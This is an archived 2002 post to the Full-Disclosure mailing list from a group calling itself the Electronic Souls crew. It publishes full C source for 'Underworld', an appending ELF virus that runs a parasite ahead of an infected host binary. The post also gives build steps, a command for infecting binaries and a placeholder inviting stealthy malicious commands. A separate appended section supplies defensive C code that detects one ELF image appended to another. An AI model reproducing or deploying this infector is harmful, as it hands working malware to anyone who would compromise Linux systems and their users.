es_at_hush.com
Date: Fri Nov 29 2002 - 20:14:12 CST


    -----BEGIN PGP SIGNED MESSAGE-----

    Dear List,

    As the title of this email suggests, no members of our crew are owned.

    Please enjoy the code.

    # cat 4553underworld.c
    /*
     -----------------------------------------------------------
     [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW]
     ------------------- DO NOT DISTRIBUTE ! -------------------
     -----------------------------------------------------------

     [Underworld] - append ELF infect0r
                                       (C) BrainStorm - 01-2002
     -----------------------------------------------------------
     Information :
     +++++++++++++
     This ELF Infector uses the appendage infection tekneeq!
     that means two executables are appended together.

     It worx like that :

      _________________
     |                 |  The Parasite Code is first, thats why
     | [PARASITE CODE] |  it needs to know its own size.
     |_________________|
     |                 |  the host code stays untouched and gets
     | [ORIGINAL CODE] |  extracted and executed from the virus.
     |_________________|

     -----------------------------------------------------------

     to get it working :
     +++++++++++++++++++
     'gcc code.c -O2 -o code', then get the file size and change
     the define in the code, now recompile and we are done ;)

     -----------------------------------------------------------

     to infect a binary :
     ++++++++++++++++++++
     cat /bin/binary >> underworld
     you get the point ...

     -----------------------------------------------------------

     special thanks to :
     +++++++++++++++++++
     ghQst and SectorX for making me interested in ELF infection
     and for being there for me since back in the days =) !

     shouts go out to all ElectronicSouls members - j00 r0ck =)

     -----------------------------------------------------------
      [ElectronicSouls] - keep the spirit alive !
     -----------------------------------------------------------

    */

    /*

     KUNG FOO !

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <sys/stat.h>

    #define PARASIZE 14985 /* dont forget to change me ! */
    #define TEMP ".para.tmp" /* tmp file */
    #define KILL(X) exit(1) /* what could this be ? */

    int main(int argc, char *argv[], char *envp[])
    {
            int input,
                output,
                lenght;

            char *dope;
            struct stat stat;

            printf("\n\n Welcome on the other side ;> \n 0x45 0x53 ! ph34r our krad tekneeqz !# \n");

            /*

                [insert evil cmds here!]
                be sure to hide the output of external programs
                to be more stealth .. heh

                example:
                system("echo "did you know? i 0wn j00!" > /etc/motd");

                you get the point ;)

            */

            input = open("/proc/self/exe", O_RDONLY);

            if (input < 0)
            KILL("open(input)");

            if (fstat(input, &stat) < 0)
            KILL("fstat");

            lenght = stat.st_size - PARASIZE;
            dope = malloc(lenght);

            if (dope == NULL)
            KILL("malloc");

            if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE)
            KILL("lseek(input)");

            if (read(input, dope, lenght) != lenght)
            KILL("read(input)");

            close(input);
            output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);

            if (output < 0)
            KILL("open(output)");

            if (write(output, dope, lenght) != lenght)
            KILL("write(output)");

            free(dope);
            close(output);

            exit(execve(TEMP, argv, envp));
    }

    /* quick and dirty, small but effective !# */
    /* im new into this so send flames to /dev/null wh0r3z ..show better code 1st ;) */

    #

    The Electronic Souls Crew
    [ElectronicSouls] (c) 2002

    "So Tired, We Have Insomnia"

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.2 (Java)
    Note: This signature can be verified at https://www.hushtools.com/verify

    wlMEARECABMFAj3oHwkMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt9aYAoLF/hFJ55U7r
    bAa57+3t/dUOt/iJAJ4kFQNfEdrP900U3IfMU1ZwssnAgw==
    =BZRe
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
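
A defender's check for the layout the post describes (one executable followed directly by a second), as an added example that is not part of the original post: it computes where the first ELF64 little-endian image ends according to its own headers and reports whether another ELF header starts at that boundary. The function names and sample bytes are constructed for illustration, and the check assumes the first image's size on disk equals the end of its section header table or last segment, as is normal for unmodified compiler output.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Little-endian read of an n-byte unsigned field (n <= 8). */
static uint64_t le(const unsigned char *p, int n) {
    uint64_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

/* End of an ELF64 LE image according to its own headers; 0 if it does not parse. */
size_t elf_logical_end(const unsigned char *b, size_t len) {
    if (len < 64 || memcmp(b, "\x7f" "ELF", 4) || b[4] != 2 || b[5] != 1) return 0;
    uint64_t phoff = le(b + 32, 8), shoff = le(b + 40, 8), end = 64;
    uint64_t phsz = le(b + 54, 2) * le(b + 56, 2);   /* e_phentsize * e_phnum */
    uint64_t shsz = le(b + 58, 2) * le(b + 60, 2);   /* e_shentsize * e_shnum */
    if (phoff > len || phsz > len - phoff || shoff > len || shsz > len - shoff) return 0;
    if (shsz && shoff + shsz > end) end = shoff + shsz;
    for (uint64_t o = phoff; phsz && o + 56 <= phoff + phsz; o += le(b + 54, 2)) {
        uint64_t off = le(b + o + 8, 8), fsz = le(b + o + 32, 8);  /* p_offset, p_filesz */
        if (off > len || fsz > len - off) return 0;   /* segment runs past the file */
        if (off + fsz > end) end = off + fsz;
    }
    return (size_t)end;
}

/* Offset of a second ELF image glued directly behind the first, or -1. */
long appended_elf_offset(const unsigned char *b, size_t len) {
    size_t end = elf_logical_end(b, len);
    if (end == 0 || len - end < 4) return -1;
    return memcmp(b + end, "\x7f" "ELF", 4) ? -1 : (long)end;
}

/* Constructed sample: 120-byte ELF64 stub, optionally followed by a second ELF magic. */
size_t build_sample(unsigned char *out, int with_host) {
    memset(out, 0, 136);
    memcpy(out, "\x7f" "ELF\x02\x01\x01", 7);   /* magic, ELFCLASS64, little-endian */
    out[32] = 64; out[54] = 56; out[56] = 1;    /* e_phoff, e_phentsize, e_phnum */
    out[64 + 32] = 120;                         /* p_filesz; p_offset stays 0 */
    if (with_host) memcpy(out + 120, "\x7f" "ELF", 4);
    return with_host ? 136 : 120;
}

int main(void) {
    unsigned char buf[136];
    printf("appended ELF at offset %ld\n", appended_elf_offset(buf, build_sample(buf, 1)));
    return 0;
}
```

Trailing data alone is not conclusive, since some legitimate programs carry an overlay after the ELF image; the second ELF magic exactly at the boundary is what matches the structure in the post.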